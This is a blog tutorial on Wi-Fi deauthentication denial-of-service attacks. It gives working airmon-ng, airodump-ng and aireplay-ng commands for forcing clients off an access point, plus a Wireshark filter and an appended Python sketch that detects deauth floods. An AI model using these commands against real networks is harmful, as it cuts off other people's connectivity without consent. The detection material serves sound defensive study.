Deauthentication Attack

Mr. Robot
Published in InfoSec Adventures
Jan 7, 2018

This Denial of Service attack targets the clients connected to a wireless network. The idea is to send deauthentication frames to the clients on behalf of the Access Point. When a connected client receives this type of wireless frame, it is obligated to disconnect from the network immediately.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

I’ll use Airodump-ng in order to identify the target network, but there are a number of tools out there for this job.

airodump-ng MONITOR_INTERFACE

Usually, you are presented with a large number of access points. You can narrow the list down to show only the target AP.

airodump-ng --bssid AP_MAC_ADDRESS MONITOR_INTERFACE

It’s good practice to set the WNIC (Wireless Network Interface Controller) to the same channel as the target AP.

ifconfig INTERFACE down
iwconfig INTERFACE channel CHANNEL
ifconfig INTERFACE up

You can capture deauthentication frames being sent in Wireshark with this filter:

wlan.fc.type_subtype == 0x0c

In this step, I launch the aireplay-ng tool to transmit deauthentication frames on behalf of the AP to all the clients.

aireplay-ng -0 10 -a AP_MAC_ADDRESS MONITOR_INTERFACE

In “-0 10”, the -0 specifies that this is a deauthentication attack and 10 is the number of frames, which you can freely change. You can also disconnect a specific client with the -c CLIENT_MAC_ADDRESS switch.

Final words

A wireless Denial of Service attack is an active attack, meaning that we are transmitting malicious frames that can be detected by an intrusion detection system or by sniffing traffic with Wireshark.
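A sketch of the detection mentioned above, as an added example that is not part of the original article: it recognises deauthentication frames in radiotap-encapsulated captures using the same type/subtype value as the Wireshark filter, and raises one alert when the frames for a BSSID reach a rate threshold. The threshold, window, function names and sample frames are assumptions made for illustration.

```python
import struct
from collections import defaultdict, deque

def parse_deauth(pkt: bytes):
    """Return (dst, src, bssid, reason) for a radiotap-wrapped deauth frame, else None."""
    if len(pkt) < 4:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]  # radiotap length field, little-endian
    frame = pkt[rt_len:]
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if (ftype << 4) | subtype != 0x0C:  # same value as wlan.fc.type_subtype == 0x0c
        return None
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    reason = struct.unpack_from("<H", frame, 24)[0]
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(events, threshold=5, window=1.0):
    """events: time-ordered (timestamp, raw_packet) pairs. Returns [(ts, bssid, count)]."""
    recent, active, alerts = defaultdict(deque), set(), []
    for ts, pkt in events:
        parsed = parse_deauth(pkt)
        if parsed is None:
            continue
        bssid = parsed[2]
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop frames that fell out of the sliding window
            q.popleft()
        if len(q) < threshold:
            active.discard(bssid)
        elif bssid not in active:  # alert once per burst, not once per frame
            active.add(bssid)
            alerts.append((ts, bssid, len(q)))
    return alerts

def sample_frame(dst, bssid, fc0=0xC0, reason=7):
    """Constructed capture record: 8-byte radiotap header + management frame."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    hdr = bytes([fc0, 0, 0, 0]) + m(dst) + m(bssid) + m(bssid) + b"\x00\x00"
    return struct.pack("<BBHI", 0, 0, 8, 0) + hdr + struct.pack("<H", reason)

# Constructed sample data (addresses are made up): one isolated deauth, one beacon, one burst.
AP, OTHER, BCAST = "02:00:00:00:00:01", "02:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"
SAMPLE = [(3.0, sample_frame(BCAST, OTHER, reason=3)), (5.0, sample_frame(BCAST, AP, fc0=0x80))]
SAMPLE += [(10.0 + i * 0.05, sample_frame(BCAST, AP)) for i in range(10)]

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

An isolated deauthentication frame is normal when a client leaves a network, which is why the example alerts on the rate per BSSID rather than on every frame.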
